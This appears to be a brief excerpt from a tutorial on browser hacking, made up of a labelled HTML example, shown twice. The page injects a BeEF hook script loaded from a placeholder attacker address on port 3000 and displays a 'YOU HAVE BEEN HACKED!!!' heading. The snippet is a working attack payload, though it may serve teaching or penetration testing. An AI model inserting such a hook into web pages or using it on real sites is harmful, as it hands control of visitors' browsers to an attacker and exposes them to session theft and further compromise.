HTML Code 1: Injecting BeEF hook script in HTML |
<HTML> |
<head> |
<title> BeEF Hacking</title> |
<script src=”http://Attacker_IP_ADDRESS:3000/hook.js”></script> |
</head> |
<body> <h1> YOU HAVE BEEN HACKED!!!</h1> </body> |
</HTML> |
HTML Code 1: Injecting BeEF hook script in HTML |
<HTML> |
<head> |
<title> BeEF Hacking</title> |
<script src=”http://Attacker_IP_ADDRESS:3000/hook.js”></script> |
</head> |
<body> <h1> YOU HAVE BEEN HACKED!!!</h1> </body> |
</HTML> |